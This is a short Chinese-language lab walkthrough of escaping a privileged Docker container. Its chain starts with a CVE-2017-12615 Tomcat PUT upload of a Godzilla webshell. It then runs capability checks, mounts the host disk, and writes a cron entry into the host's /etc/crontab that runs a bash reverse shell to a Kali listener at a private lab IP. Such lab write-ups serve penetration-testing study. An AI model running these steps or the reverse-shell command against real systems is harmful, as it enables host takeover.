目录

1.环境

2.上线哥斯拉

3.特权模式逃逸

docker%E7%8E%AF%E5%A2%83-toc" name="tableOfContents" style="margin-left:40px">1.判断是否为docker环境

2.判断是否为特权模式

docker-toc" name="tableOfContents" style="margin-left:40px">3.挂载宿主机磁盘到docker

 4.计划任务反弹shell

---

1.环境

ubuntu部署一个存在CVE-2017-12615的docker:   (ip:192.168.117.147)    

kali(ip:192.168.117.128)

哥斯拉

2.上线哥斯拉

这里用PUT上传哥斯拉生成的jsp马直接上线：

3.特权模式逃逸

docker%E7%8E%AF%E5%A2%83" name="1.%E5%88%A4%E6%96%AD%E6%98%AF%E5%90%A6%E4%B8%BAdocker%E7%8E%AF%E5%A2%83">1.判断是否为docker环境

ls -alh /.dockerenv    //如果存在即为docker环境

2.判断是否为特权模式

cat /proc/self/status | grep CapEff	//cat /proc/self/status​ 用于查看当前进程的状态信息。
//grep CapEff​ 用于从输出结果中过滤出 CapEff 相关的行
//capability ​是一种权限机制，利用 CapEff 我们可以了解当前进程实际拥有的权限和能力。

 如果是这两种情况之一，即可判断为当前docker为特权模式启动 ：

0000003fffffffff
0000001fffffffff

docker" name="3.%E6%8C%82%E8%BD%BD%E5%AE%BF%E4%B8%BB%E6%9C%BA%E7%A3%81%E7%9B%98%E5%88%B0docker">3.挂载宿主机磁盘到docker

fdisk -l                 //列出所有磁盘，找到宿主机的磁盘
mkdir ceshi              //创建一个目录用于挂载磁盘
mount /dev/sda1  ceshi   //将宿主机的磁盘挂载到ceshi目录下，即可操作宿主机磁盘上的内容了

 4.计划任务反弹shell

当前docker没有vi,vim,nano等,这里用echo写入：

touch test.sh                
echo 'bash -i >& /dev/tcp/192.168.117.128/4444 0>&1' >test.sh    
echo '* * * * * root bash test.sh' >> /etc/crontab    

然后kali这边监听就可以了：

nc -lvvp 4444